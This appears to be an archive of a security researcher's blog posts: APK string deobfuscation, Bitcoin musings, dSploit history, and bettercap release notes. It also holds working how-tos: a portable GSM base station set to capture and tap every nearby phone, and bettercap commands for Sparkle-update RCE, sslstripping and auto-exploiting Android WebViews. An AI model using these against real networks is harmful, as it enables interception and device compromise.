NOTE

I like spy movies a lot, so if this just looks like bullshit to you be fair and be good, I'm just worried about the people's privacy :)

BitCoin Drama

I don't know if you've been following the whole BitCoin and Satoshi Nakamoto drama, basically Mr. Craig Wright claims that he is Nakamoto, reveiling, finally, the true BitCoin creator's identity.

He also showed some alleged crypto proof.

Suddenly, on Reddit people started to explain how this "proof" was fake.

JoukeH discovered that the signature on Craig Wright's blog post is not a signature of any "Sartre" message, but just the signature inside of Satoshi's 2009 Bitcoin transaction. It absolutely doesn't show that Wright is Satoshi, and it does very strongly imply that the purpose of the blog post was to deceive people. So Craig Wright is once again shown to be a likely scammer. When will the media learn?
Take the signature being “verified” as proof in the blog post:
MEUCIQDBKn1Uly8m0UyzETObUSL4wYdBfd4ejvtoQfVcNCIK4AIgZmMsXNQWHvo6KDd2Tu6euEl13VTC3ihl6XUlhcU+fM4=

Convert to hex: 3045022100c12a7d54972f26d14cb311339b5122f8c187417dde1e8efb6841f55c34220ae0022066632c5cd4161efa3a2837764eee9eb84975dd54c2de2865e9752585c53e7cce

Find it in Satoshi's 2009 transaction: https://blockchain.info/tx/828ef3b079f9c23829c56fe86e85b4a69d9e06e5b54ea597eef5fb3ffef509fe?format=hex
Also, it seems that there's substantial vote manipulation in /r/Bitcoin right now...

I just thought "oh, some bad guy is speculating on bitcoins ... meh" ... but then this came out:

Why I declined to "verify" SN's identity two weeks ago

About two weeks ago I was contacted and asked to offer security advice for a project. I was asked to sign an NDA in order to discuss the project itself, something I am reluctant to do, in general. Once I received the NDA however, it became obvious that the project was related to verifying the identity of Satoshi Nakamoto. I immediately declined the offer, declined to participate and declined to sign the NDA. I'm sure many people will think I was wrong to decline the "opportunity" to verify SN's identity. From my perspective, the request for me to verify his/her/their identity is in itself an appeal to authority. It is replacing public cryptographic proof with endorsement by a third party. If SN wants to "prove" their identity, they don't need an "authority" to do so. They can do it in a public, open manner. To ask people in the space who have a reputation to stake that reputation and vouch for SN's identity raises many red flags in my mind.
I don't know if Craig Wright is SN. I don't care and I don't want to know.
As I have expressed many times in the past, I think the identity of Satoshi Nakamoto does not matter. More importantly I think it serves to distract from the fact that bitcoin is not controlled by anyone and is not a system of Appeal-to-Authority. Identifying the creator only serves to feed the appeal-to-authority crowd, as if SN is some kind of infallible prophet, or has any say over bitcoin's future.
Identity and authority are distractions from a system of mathematical proof that does not require trust. This is not a telenovela. Bitcoin is a neutral framework of trust that can bring financial empowerment to billions of people. It works because it doesn't depend on any authority. Not even Satoshi's.
Back to work.

The user who posted is not just some unknown, random user, he's a well recognized part of the Reddit community.

I'm neither a crypto expert nor a politics expert, but what I know is that during these very same days, governments all over the world are discussiong about our privacy, the right to have encrypted and private communications and so forth.

• http://thehackernews.com/2016/04/fbi-hacking-power.html
• http://thehackernews.com/2016/04/tor-unmask-malware.html
• http://thehackernews.com/2016/04/apple-vulnerability.html

And these links are just a small example about what is happening.

Having said that ... isn't this BitCoin thing very peculiar at this time?

If someone is really trying to replace cryptokeys and take control of the BitCoin market, who is he? Or ... who are them? Which organization is big enough to compromise/buy the media and spread such BS at such level?

Is it just me, or this is some kind of declaration of cyber war to the free people of the free web, us?

Maybe ... yeah, it's just me ... or maybe George Orwell was very right.

Perhaps a lunatic was simply a minority of one.

George Orwell, 1984

He was trying to deobfuscate an APK in order to understand its obfuscation and anti tampering (more on this later) protections so I started working on it as well.

This was definitely way more challenging ( and fun! ) than my usual APK reversing session ( dex2jar -> jd-gui -> done ), moreover this required me to write a new tool which I find kinda cool and unique ( IMHO of course ), so I'm going to share the story in this post.

I'm going to intentionally skeep a few details here and there because I do not want to cause any harm to the people who wrote that application, all the involved protection mechanisms are there to avoid piracy.

Weird Characters Are Weird

Like every other reverser who experienced APK decompilation I'm used to Proguard messing with class and method names ( or Dexguard messing with strings, and so forth ), this is not usually a big deal to me, but what I saw when I executed apktool was definitely surprising:

Most of the classes and methods names were weird binary strings, this almost freezed every single tool or editor I used to inspect those files, so the very first step was to fix ( to be honest, reimplement from scratch XD ) the python script that Matteo was trying to use to rename each obfuscated entry, the script itself was quite simple:

• Loop all smali files with non printable names.
• Replace the obfuscated class name with ClassXXX ( where XXX is an incremental integer ).
• Rename the files.
• Search for every references to those classes and patch them with the new names ( regular expressions FTW! ).
• Repeat the process against .field directives ( class members, methods, etc ).

At the end of the process, I finally had a browsable folder and readable smali files :)

But I was definitely far from having done ...

Anti Tampering

Before I continue, there're two things I need to point out in order to make the reasons behind my approach clearer:

1. Matteo told me that the application had some misterious anti tampering ( and most likely anti debugging ) protection, therefore rebuilding the smali to a new APK with some injected code was not possible, neither was debugging.
2. Such protections not only prevented code injection/modification, but also uninstalled the application if such tampering was detected.

So no code injection ( nope, XPosed neither ), no debugging, absolutely no chance to use my standard approach for reversing it :(

Encrypted Strings

As the lazy (or smart, you decide) reverser I am, instead of trying to understand the logic, at first I tried to search for meaningful strings that could give me some hints about what was going on in the app, but again I had a nasty surprise instead.

Every single string was encrypted with a custom algorithm, basically every reference to a string was replaced by something like:

String decrypted = Class623::method5( new int[]{ -12, 44, -35, ... }, 52 );  

Just a long array of integers and another integer as the second argument (maybe some sort of key?)

What I usually do in these cases is:

1. Decompile the APK to java ( with dex2jar + jd-gui or just jadx ).
2. Take the java code of the decryption routine and paste it in a stand alone java console application.
3. Run the decryption routine against the encrypted stuff and eventually get the clear text results.

Guess what? Every single tool failed to correctly transform the smali code of Class623::method5 into java ... the output was just nonsense, not working, nada ... and for the record I'm not that good in reading smali code (the routine itself was quite complicated, at least for my smali skills) ... but I couldn't just give up ... no way!

All hail the Smali Emulator

Of course I could take the smali code of Class623::method5, create a new Android app, decompile it with apktool, inject the smali code of that routine into the output, insert a smali call to that code into the app, rebuild it and launch it ... but:

1. Again, I'm lazy.
2. This solution wouldn't be elegant.
3. A new idea was just born in my head and it was just too cool, I had to try it!

Long story short, I said to myself:

Fuck this, I'm gonna write a smali parser and emulator and feed it with this routine, eventually it will output all the cleartexts I need!

So I started reading Dalvik opcodes specs ( tnx to Gabor Paller for this! ) and putting some code together, after a few hours I had this simple script ready for testing:

from smali.emulator import Emulator

emu = Emulator()

# The smali file to emulate.
filename = 'decryptor.smali'  
# Arguments for the method.
args = {  
    'p0': (-62, -99, -106, -125, -123, -105, -98, -37, -105, -97, -103, -41, -118, -97, -113, -103, -109, -104, -115, 111, 98, 103, 35, 52),
    'p1': 19
}

ret = emu.run( filename, args )

print emu.stats

print "RESULT:\n"  
print "'%s'" % ret  

Aaaaaaand:

BINGO!!!

I executed the script against every encrypted string and it worked like a charm, the emulator was able to correctly parse and execute the smali code of the decryption routine and decrypt every single entry I've extracted from the decompiled application ... from that point on it was just a matter of replacing encrypted entries with their cleartexts and the reversing process became as easy as pie :)

Conclusions

I've released the code on github as usual, it still lacks the support for a lot of Dalvik opcodes, I've just implemented the ones I needed in order to emulate that routine ( which you can find in the repo as well ), but it's quite easy to improve it and probably I'll complete it in the next few days :)

In this blog post I'm going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking ... yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception.

I'm not writing this post to help script kiddies breaking the law, my point is that GSM is broken by design and it's about time vendors do something about it considering how much we're paying for their services.

Hardware Requirements

In order to build your BTS you'll need the following hardware:

• A bladeRF x40
• Two Quad-band Cellular Duck Antennas SMA.
• A Raspberry Pi 3 ( model 2 and below are too slow ).
• An USB battery pack ( I'm using a 26800mAh Anker Astro E7 ).
• A microsd for the RPI >= 8GB.
• Some patience and time ... :)

Software

Let's start by installing the latest Raspbian image to the micrsd card ( use the "lite" one, no need for UI ;) ), boot the RPI, configure either the WiFi or ethernet and so forth, at the end of this process you should be able to SSH into the RPI.

Next, install a few dependecies we're gonna need soon:

sudo apt-get install git apache2 php5 bladerf libbladerf-dev libbladerf0 automake

At this point, you should already be able to interact with the BladeRF, plug it into one of the USB ports of the RPI, dmesg should be telling you something like:

[ 2332.071675] usb 1-1.3: New USB device found, idVendor=1d50, idProduct=6066
[ 2332.071694] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 2332.071707] usb 1-1.3: Product: bladeRF
[ 2332.071720] usb 1-1.3: Manufacturer: Nuand
[ 2332.071732] usb 1-1.3: SerialNumber: b4ef330e19b718f752759b4c14020742

Start the bladeRF-cli utility and issue the version command:

pi@raspberrypi:~ $ sudo bladeRF-cli -i
bladeRF> version

  bladeRF-cli version:        0.11.1-git
  libbladeRF version:         0.16.2-git

  Firmware version:           1.6.1-git-053fb13-buildomatic
  FPGA version:               0.1.2

bladeRF> 

IMPORTANT Make sure you have these exact versions of the firmware and the FPGA, other versions might not work in our setup.

Now we're going to install Yate and YateBTS, two open source softwares that will make us able to create the BTS itself.

Since I spent a lot of time trying to figure out which specific version of each was compatible with the bladeRF, I've created a github repository with correct versions of both, so in your RPI home folder just do:

git clone https://github.com/evilsocket/evilbts.git
cd evilbts

Let's start building both of them:

cd yate
./autogen.sh
./configure --prefix=/usr/local
make -j4
sudo make install
sudo ldconfig
cd ..

cd yatebts
./autogen.sh
./configure --prefix=/usr/local
make -j4
sudo make install
sudo ldconfig

This will take a few minutes, but eventually you'll have everything installed in your system.

Next, we'll symlink the NIB web ui into our apache www folder:

cd /var/www/html/
sudo ln -s /usr/local/share/yate/nib_web nib

And grant write permission to the configuration files:

sudo chmod -R a+w /usr/local/etc/yate

You can now access your BTS web ui from your browser:

http://ip-of-your-rpi/nib

Time for some configuration now!

Configuration

Open the /usr/local/etc/yate/ybts.conf file either with nano or vi and update the following values:

Radio.Band=900
Radio.C0=1000
Identity.MCC=YOUR_COUNTRY_MCC
Identity.MNC=YOUR_OPERATOR_MNC
Identity.ShortName=MyEvilBTS
Radio.PowerManager.MaxAttenDB=35
Radio.PowerManager.MinAttenDB=35

You can find valid MCC and MNC values here.

Now, edit the /usr/local/etc/yate/subscribers.conf:

country_code=YOUR_CONTRY_CODE
regexp=.*

WARNING Using the .* regular expression will make EVERY GSM phone in your area connect to your BTS.

In your NIB web ui you'll see something like this:

Enable GSM-Tapping

In the "Tapping" panel, you can enable it for both GSM and GPRS, this will basically "bounce" every GSM packet to the loopback interface, since we haven't configure any encryption, you'll be able to see all the GSM traffic by simply tcpdump-ing your loopback interface :D

Start It!

Finally, you can start your new BTS by executing the command ( with the BladeRF plugged in! ) :

sudo yate -s

If everything was configured correctly, you'll see a bunch of messages and the line:

Starting MBTS...
Yate engine is initialized and starting up on raspberrypi
RTNETLINK answers: File exists
MBTS ready

At this point, the middle LED for your bladeRF should start blinking.

Test It!

Now, phones will start to automatically connect, this will happen because of the GSM implementation itself:

• You can set whatever MCC, MNC and LAC you like, effectly spoofing any legit GSM BTS.
• Each phone will search for BTS of its operator and select the one with the strongest signal ... guess which one will be the strongest? Yep ... ours :D

Here's a picture taken from my Samsung Galaxy S6 ( using the Network Cell Info Lite app ) which automatically connected to my BTS after 3 minutes:

From now on, you can configure the BTS to do whatever you want ... either act as a "proxy" to a legit SMC ( with a GSM/3g USB dongle ) and sniff the unencrypted GSM traffic of each phone, or to create a private GSM network where users can communicate for free using SIP, refer to the YateBTS Wiki for specific configurations.

Oh and of course, if you plug the USB battery, the whole system becomes completely portable :)

References and Further Readings

• https://github.com/Nuand/bladeRF/wiki/Setting-up-Yate-and-YateBTS-with-the-bladeRF
• https://z4ziggy.wordpress.com/2015/05/17/sniffing-gsm-traffic-with-hackrf/
• https://z4ziggy.wordpress.com/2015/05/10/ziggys-embedded-bts/
• http://wiki.yatebts.com/index.php/Main_Page

Yesterday Radek from VulnSec posted an interesting article named "There's a lot of vulnerable OS X applications out there.", he discovered that the Sparkle update system ( used by some very popular OSX apps such as VLC, Adium, iTerm and so forth ) uses HTTP instead of HTTPS to fetch updates informations for such applications, making all of them vulnerable to man in the middle attacks and, as he shown, remote command execution attacks.

I'm not going to explain the details of his attack, his post is quite self explainatory, but I'll show you how easy it is to mass pwn OSX machines on your network using the new OSX Sparkle bettercap proxy module.

Moreover, I improved the attack ... Radek shown how to get RCE using an OSX terminal profile file, I will show you how to make the target execute any Mach-O exetutable you want! ( metasploit anyone? )

This is a screenshot of my MacBook Pro running OSX El Capitan with the latest version of VLC installed, being exploited and running a sample "Hello World" binary.

Once you downloaded the aforementioned proxy module, install the ftpd gem:

sudo gem install ftpd

and use the bettercap command line:

sudo bettercap --proxy-module osxsparkle.rb --sparkle-rce-file /path/to/some/executable

Where /path/to/some/executable is the path to a Mach-O executable on your computer, this is the executable that all the targets are going to execute.

Well, enough said, have fun :)

Let me clear one thing about this post ... this is not a CloudFlare vulnerability report and, even in that case, there's really nothing they could do in order to fix it unless they'd block direct traffic to HTTP websites. This is only a blog post about why you shouldn't blindly trust free services that offer you some sort of SSL protection if your server itself is not SSL protected by default.

UPDATE: n0on3 noted on twitter that even a properly configured server / blocking plain HTTP won’t work if the mitm catches the first request.

During this week, I've been playing with CloudFlare free plan in order to turn my websites into HTTPS protected websites, while configuring my account and playing a little bit with bettercap I figured out something really weird and I tweeted this ( from the @bettercap account ):

Someone from their team asked me to report this issue on HackerONE and eventually they decided to not accept it ... well, not a big deal, I didn't want to get money out of it in the first place and I didn't consider this to be a "real" vulnerability from their side, but just something they should take into account while writing their documentation and informing users, this is how it ended ( and that's why I'm disclosing this ) :

The Attack

My configuration is the following:

• One website hosted on my dedicated server running only via HTTP ( no HTTPS available ).
• CloudFlare SSL configured to Flexible ( since I have no certificate whatsoever ).

• HSTS on with everything enabled ( browser preload as well ).

• A page rule configured ( as they wrote on the documentation ) to "Always uses https".

What I was expecting was that every request made against the HTTP website would be redirected to the CloudFlare HTTPS endpoint, effectively forcing every user to only browse through HTTPS ... well, it turned out that this configuration is quite easy to bypass using BetterCap or any other offensive tool that performs sslstripping and "Redirect to HTTPS" patching ...

But how? And why?

This attack will work if and only if the victim/target is browsing the HTTP(S) CloudFlare protected website for the very first time, since from the second time on, its browser would cache the HSTS preload rule and would perform a HTTP -> HTTPS redirect without waiting for an actual 307 redirect from the CloudFlare's proxy.

You just need to launch bettercap with the following command line arguments:

sudo bettercap -T IP-OF-THE-TARGET --proxy

From that moment on, bettercap will start sslstripping and patching every redirect to HTTPS:

As you can see from the screenshot, once bettercap intercepted the redirect to the HTTPS website, it just killed it and left the victim browsing the page through HTTP ( while proxying the data through HTTPS to the real endpoint ).
This allows the tool to see the traffic from both sides in cleartext, manipulate it, and so forth.

This happens because the my original webserver had only the HTTP port exposed and no HTTPS capabilities at all, as I already mentioned the only way for CloudFlare to fix this would be to block all the traffic going through the original HTTP server and only permit it if it's through SSL.

Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.

NOTE

The original title of this post was Autopwn every Android device on your network using BetterCap and the "addJavascriptInterface" vulnerability and some people pointed out it's a misleading title since "every Android != every Android < 4.2". I totally agree with them, it wasn't intentional, the point of this post itself was not to show some uber 0day technique, but just to show how easy it is to use bettercap in order to exploit such type of vulnerabilities.

There's an excellent post about this vulnerability, long story short, if there's an app which is using a WebView UI control and it's declaring a custom javascript interface for it like so:

you can inject some special javascript into that page and make that device execute any shell command you want.

In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've wrote the AndroidPwn transparent proxy module.

As you can see, you just need to activate it and specify a --command COMMAND command line argument and you're ready to go.

Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every single Android device it will find on the network.

BetterCap will be the very first MITM framework to have this feature 100% working without any additional spoofers.

If you're thinking about ettercap ICMP spoofer which was released (I think) years ago, let me remind you what its documentation says about it:

Obviously you have to be able to sniff all the traffic. If you are on a switch you have to use a different mitm attack such as arp poisoning.

So yeah, unless you're already able to sniff network traffic ( in which case, why would you even need to do a MITM attack?!?!?! ), ettercap's ICMP module is completely useless.

On the other hand, MITMf is not that much better, if you look closely at its code, you will find that the ICMP spoofer only does this:

def build_icmp(self):
   pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5,    code=1, gw=self.ip_address) /\
              IP(src=self.target, dst=self.gateway)/UDP()

   return pkt

Which basically will only reroute traffic to the gateway.

In order to have a real and full duplex MITM using ICMP Redirect packets, you have to reroute the gateway and every other address that the target/victim is requesting, which is why I used
a DNS watcher thread just like described on Zimperium's blog post.

So stay tuned guys, the next release is close!

Major Changes

Added --no-discovery argument to skip active host discovery. ( since v.1.1.0 )

Sometimes you already have the hosts you want to target in the arp cache of your computer, maybe because you already used bettercap against them or just because you already established some communication with them, you can now use the --no-discovery argument to use the static ARP cache instead of spawning the discovery agents and make the whole process faster.

Dynamic discovery, new hosts are added to the targets list while running. ( since v1.1.0 )

Once bettercap is started, it will keep searching for new hosts and add them to the targets list even if an attack is already running. You can basically just launch bettercap once and it will take care of new computers connecting to your internal network.

Implemented HTTP transparent proxy with modules support. ( since v1.1.0 )

No need for explanations here, you can find the complete documentation of the transparent proxy and its modules here.

Added builtin HTTP server. ( since v1.1.1 )

There's now a simple builtin HTTP server available, you can use it to serve static assets such as images or js files that you might need in your custom proxy module.

New feature to save all packets to a pcap file ( --sniffer-pcap option ). ( since v1.1.2 )

You don't have time to manually inspect everything you're sniffing from the network? No problems! You can use the --sniffer-pcap argument to save every sniffed packet to a PCAP file and inspect it later.

New --sniffer-filter argument to pass custom BPF filters to the sniffer. ( since v1.1.2 )

Of course, you can use a custom BPF filter in order to save only the packets you're really interested into :)

Added --no-spoofing argument ( alias for --spoofer NONE ). ( since v1.1.2 )

If you want to use bettercap as a local proxy/sniffer to debug or reverse engineer some application, you can easily disable the spoofing using the --no-spoofing argument.

New --check-updates option will check if a new version of bettercap is available. ( since v1.1.3 )

You can now check if a new version is available directly from bettercap.

First prototype of HTTPS transparent proxy with realtime crafted certificate and/or custom .pem file. ( since v1.1.4 )

Yep, since v1.1.4 bettercap is also able to intercept and proxy HTTPS traffic using certificate pinning, both using a realtime built certificate or a custom PEM file.

Added dynamic ARP agent/sniffer that will reply to ARP who-has requests when needed. ( since v1.1.4 )

As new legit ARP requests are intercepted on the network, the program will take care of generating a proper ( spoofed of course :P ) response.

Implemented half-duplex mode for weird routers that whenever receive an ARP_OPREPLY suddenly sends an ARP_OPREQUEST to the real ip, screwing up MITM ( since v1.1.4 )

This was a new feature I implemented in order to fix a weird behaviour me and some users experienced with particular routers, a full description of this new mode can be found here.

Now the user can target more than one address at once ( since v1.1.4, tnx to @mvrilo )

The --target argument now supports a comma separated list of targets.

Now the user can load more than one spoofer at once ( since v1.1.4, tnx to @minotaur-0 )

The --spoofer argument now supports a comma separated list of spoofing modules.

New argument to manually specify the gateway address ( since v1.1.5, tnx to @misterade )

The gateway address can now be manually specified on the command line, this is an optional argument which is needed only when you already know the gw address and don't want bettercap to search for it.

New --sniffer-source argument to read a pcap file instead of sniffing from the network interface. ( since v1.1.5 )

If you're running bettercap as a simple sniffer/cretendials harvester, you can "replay" an already captured pcap file and feed it to the program instead of capturing real time traffic.

Updated hw-prefixes file with latest version from nmap repository. ( since v1.1.6 )

This made the "mac-address to vendor" lookup more accurate.

Implemented custom upstream proxy options ( --custom-proxy, --custom-https-proxy ) both for HTTP and HTTPS. ( since v1.1.6 )

A new set of arguments is available in order to specify a custom HTTP/HTTPS upstream proxy address.

The Future

If you're interested in upcoming features, there's a "TODO" list available here, some of these items are done and the code has already been pushed to the dev branch, others are still to be done and I'm still not sure about some, these are the major upcoming features.

Implement --ignore ADDR,ADDR,ADDR option to filter out specific addresses from the targets list. ( READY in the developer branch )

If there're one or multiple ip addresses that are causing a lot of traffic and that you're not interested to, you can use this argument to completely ignore them.

Rewrite proxy class using em-proxy library.

I'm currently working on a complete rewriting of the Proxy class that will dramatically increase its performances thanks to the great em-proxy gem by Ilya Grigorik.

Active packet filtering/injection/etc

This still needs to be started, but in the future there will be a modular packet injector/filter ( pretty much like the modular HTTP(S) transparent proxy but for raw packets ^_^ ), probably powered by the nfqueue Ruby gem by Guillaume Delugré.

BSD Support. ( !!!Help wanted here!!! )

Bettercap is already compatible with Mac OS X and basically every distribution of GNU/Linux, I'd like some BSD guru to help me to make it compatible with *BSD systems as well.

HTTP/2 Support.

Self explanatory, still in TODO.

This time I've decided to write a purely personal post, mainly because I've reached a stage in my life in which I believe I've understood a number of things that I'd like to share, in the hopes of helping someone facing similar circumstances to my own.

I don't feel my knowledge of the English language would have allowed me to express myself accurately, so I wrote this in Italian, and had it translated from a friend of mine ( tnx! ).

Who I am and what Open Source means to me

For those who do not know me, I'd like to introduce myself by explaining what I've always considered Open Source to mean, a very fitting introduction to the story I'd like to tell you.
As what is left of the Royal Library of Alexandria has been preserved, or the Colosseum, Saint Peter's, art, and music, so are ideas, things that we have preserved. Sometimes these are good, productive ideas, like the discovery of a new cure, others debatable (religions, barbaric customs, violence) but nevertheless free.
The beauty of the things that belong to all of us, like works of art and ideas, is that they have always been free... you are free to partake in a religion, you are free to choose not to, and so on. My “Ideas” are my code, your code, they are the code of millions of programmers all over the world who, like me, have decided to share them with whoever wants them, preserving what little good our generation will leave behind as a legacy.

Oh, one other thing I'd like to add in introducing myself... the child in me has never accepted that pretty toys cost so much.

dSploit, the story of an experiment.

Years ago, having purchased my first android terminal, good little nerd that I am, I began gathering information on programming, operating systems, and so on... I had, after all, been using Linux for ever, Java I remembered from the old days
of project-based jobs... how hard could it be to learn?
So I signed up at XDA, read their guides (thanks, guys!!! <3) and began experimenting... I needed an initial idea, so I decided to combine my background on network security with my first experiment, namely my first Android app.

The idea was to somehow replicate ettercap's features, in other words, to carry out a MITM attack on a WiFi network from a mobile phone, using an Android application. So I started researching on Google to see if someone had already pulled off something similar (heaven forbid that I'd waste my time on an unoriginal idea! XD) and not only did I find out that someone else had had the same idea, they were distributing it as a “semi-free” product with purchasable features... unacceptable!
Not only had my idea been “stolen” ( LOL! ) but it had been ruined and transformed into something hideous... I couldn't take it.

What started out as a project soon became my little “ethical revenge” :D
It took me all of three days to learn how to program on Android, and set up my first prototype of what would soon be known as dSploit.

Needles to say that the interface was as ugly as sin, slower than molasses, and as bugged as an old mattress... but it worked, and moreover, it was free.
I immediately released the code on Github, and posted a link with a brief introduction on XDA.

I had no idea that those tiny steps would turn my life around, in just a few years.

The project literally exploded, the next day my inbox was clogged with replies to my XDA thread. People asking for more information, wanting to know how to compile the code, but most of all, people comparing it with that other app, the semi-free thing that had “ruined” my idea.

I started working on it like a dog. During the day, I kept up with my job as a PHP programmer for a company in Rome, at night and during my summer break, I wrote miles of code, considered new concepts, new functions, things those “other people” hadn't even thought of.

My idea was for everyone, and my idea worked... my idea was free.

After a while I began exchanging emails with a couple of people that had developed the “other” app, sometimes we'd exchange tips, at other times we just chatted. Turns out, they were far from the “evils suits” I'd thought them to be; they were smart, friendly guys, but most of all they were open to new ideas.
I became especially friendly with one of them, and we carried on talking every now and again over the following two or three years. During this period I changed jobs, and moved to a new home, however my life hardly changed, I was still your average guy, with an average salary.

Then, over a very short period of time, two months give or take, everything changed.

The tornado hit on what seemed to be a very typical morning at the office. My friend from that other company wrote to me, saying something on these lines (I'll never forget it):

Hey How are things? When are you planning on leaving that crappy job and joining us? You're our kind of stuff, you've always been.

As chaotic as it was, everything began to make sense. Those seemingly insignificant, disconnected events had, maybe, been leading me to where I was destined to go.

Without going into the details of the transition, the only relevant thing that happened during my first “job interview” which was in Amsterdam, mind you, was that my girlfriend, with whom I was about to celebrate our sixth anniversary, decided it was time she moved on, due to issues we'd already accepted and discussed, yada, yada, yada.

Let's fast-forward to today; it's now more than a year that I've been working on my own, from home, and yet, I have a very high salary, the work is thrilling, and working hours very flexible... lately, I've met loads of people, some I know are just passing through, others I'm sure are here to stay... I've been able to indulge in things I couldn't even dream about before, I travelled the world, and have seen more places in this last year than I've seen in a lifetime. I've been able to help many people I hold dear who needed some solid help, but most of all, I've realized something about money.... it doesn't make you happy, but it gives you the necessary freedom to build that happiness, and freedom has been the only real thing I've sought after all my life.

All these things (and for those who have been paying attention, it was really quite clear where I was going with this) I couldn't have achieved without that money, that came from an idea I had decided to set free... now that project has been forked, downloaded, cloned, improved upon, and belongs to the community, as it should.

I wanted to share this story to tell you a little about myself, debunk a few “myths” about the creation of dSploit, but most of all to give hope to all those who, like me, stay up all night in the name of an idea... be free, guys, let your ideas be preserved, and let them lead you where you are destined to go.

( o anche "Come l'anarchia delle idee può cambiare le cose" )

Questa volta voglio scrivere un post di carattere puramente personale,
principalmente perchè sono arrivato ad un certo punto della mia vita
nel quale penso di aver capito alcune cose che mi fa piacere condividere e che magari possono aiutare tante persone nella mia stessa situazione.

In Italiano perchè, purtroppo, la mia conoscenza della lingua Inglese
non è così approfondita da potermi esprimere al meglio.

Chi sono e cosa significa Open Source per me

Per chi non mi conoscesse, mi vorrei presentare esponendo quella
che è sempre stata la mia idea di Open Source, ottimo argomento di
introduzione alla storia che vi voglio raccontare.

Così come ciò che è rimasto dell antica libreria di Alessandria d'Egitto
è stato preservato nel tempo, così come il Colosseo, San Pietro, l'arte, la musica, anche le idee sono cose che abbiamo preservato.
A volte idee giuste, produttive, come la scoperta di una nuova cura, altre
opinabili ( religioni, usanze barbare, violenza ) ma pur sempre libere.
La bellezza di ciò che appartiene a tutto il mondo, come le opere d'arte e
le idee, è che sono sempre state libere ... sei libero di condividere una
religione, sei libero di non farlo, e così via.
Le mie idee, sono il mio codice, il vostro codice, sono il codice di
milioni di programmatori in tutto il mondo che come me, hanno deciso di
donarle a chiunque le voglia e così, preservare quel poco di buono che la
nostra generazione potrà avere come lascito.

Ah, un altra cosa per presentarmi ... il bambino che c'è in me non ha mai
accettato che i bei giocattoli costassero così tanto.

dSploit, storia di un esperimento.

Anni fa, comprato il mio primo terminale android da bravo nerd, subito
iniziai ad informarmi sulla sua programmazione, sistema operativo, e così
via ... del resto, usavo Linux da sempre, Java lo ricordavo dai tempi
dei vecchi lavori a progetto ... quanto mai poteva essere complicato
imparare?

Così mi iscrissi ad XDA, lessi le loro guide ( grazie ragazzi!!! <3 ) ed
iniziai a sperimentare ... mi serviva un idea per iniziare, così decisi
di mischiare il mio background nella sicurezza delle reti con il mio primo
esperimento, ovvero la mia prima applicazione per Android.

L'idea era quella di replicare in qualche modo le funzionalità di ettercap,
ovvero di eseguire un attacco MITM su una rete WiFi, tramite un applicazione
Android, direttamente dal cellulare.
Così iniziai a cercare su Google per vedere se qualcuno avesse già fatto
qualcosa di simile ( non sia mai avessi dovuto sprecare il mio tempo su
un idea non originale! XD ) e non solo scoprii che qualcun'altro aveva già
avuto la mia stessa idea, ma che la stavano distribuendo come prodotto "semi
free" con funzionalità a pagamento ... inaccettabile!

Non solo mi avevano "fregato" ( LOL! ) l'idea, ma l'avevano anche rovinata
e ne avevano fatto qualcosa di orribile ... non potevo accettare questa cosa.

Quello che era nato come un esperimento divenne la mia piccola "vendetta etica" :D

Nel giro di tre giorni, non solo avevo imparato a programmare per Android,
ma avevo già pronto il primo prototipo di quello che di li a breve, sarebbe
stato chiamato dSploit.

Inutile dire che aveva un interfaccia brutta come la morte, era lento come un
topo morto e pieno di bug ... ma funzionava e soprattutto era libero.
Rilasciai immediatamente il codice su Github, e postai un link con una breve
presentazione del progetto su XDA.

Non sapevo che quelle due piccole cose, di li a qualche anno, avrebbero rivoluzionato
la mia vita.

Il progetto fece un esplosione pazzesca, il giorno dopo trovai l'email intasata
di risposte al thread su XDA, gente che chiedeva più informazioni, gente che
voleva sapere come compilare il codice ma soprattutto, gente che faceva confronti
con l'altra applicazione, quella semi free che aveva "rovinato" la mia idea.

Di li mi misi a lavorarci sopra come un mulo, di giorno svolgevo il mio lavoro
( come sviluppatore PHP presso un azienda di Roma ), di notte e durante le ferie ( era estate ) scrivevo fiumi di codice, consideravo idee, nuove funzionalità, cose alle quali nemmeno "quegli altri" avevano mai pensato.

La mia idea era di tutti e la mia idea funzionava ... la mia idea era libera.

Dopo un po di tempo instaurai uno scambio di email con un paio delle persone
dell'azienda che aveva sviluppato "l'altra" applicazione, a volte ci scambiavamo
consigli e a volte si chiacchierava. Non erano affatto "i mostri con la cravatta"
che avevo immaginato, anzi, erano dei ragazzi brillanti, simpatici e soprattutto
aperti a nuove idee.
Divenni particolarmente amico con uno di loro due e continuammo a chiacchierare
in chat di tanto in tanto per i successivi due o tre anni, periodo durante il
quale cambiai lavoro e casa ma nonostante questo il mio stile di vita rimase
sostanzialmente sempre lo stesso, una persona normalissima con uno stipendio
normalissimo.

Finchè, durante un brevissimo lasso di tempo durato all'incirca due mesi, tutto
cambiò.

Il vortice arrivò una mattina qualunque, mentre ero in ufficio a lavorare, quando
il mio vecchio amico dell'altra società si fece nuovamente vivo in chat, esordendo con
la frase ( non la scorderò mai ):

Hey Come va? Quando hai intenzione di lasciare quel lavoro merdoso ed unirti a noi? Tu sei nostro materiale, lo sei sempre stato.

Tutto, per quanto caotico, iniziò ad avere un senso, tutti quei piccoli ed insignificanti
eventi apparentemente disconnessi tra loro, forse mi stavano portando dove ero destinato
ad andare.

Inutile parlare dei dettagli della transizione, l'unica cosa rilevante fu che, durante
il primo "colloquio di lavoro" ( ad Amsterdam, non dico altro ... ) la mia ragazza "storica",
con la quale avrei festeggiato sei anni insieme da li a breve, decise di lasciarmi,
per problemi di coppia che entrambi avevamo già ammesso, discusso e bla bla bla.

Facciamo un salto in avanti e arriviamo ad oggi, ormai è più di un anno che lavoro da solo, da casa mia,
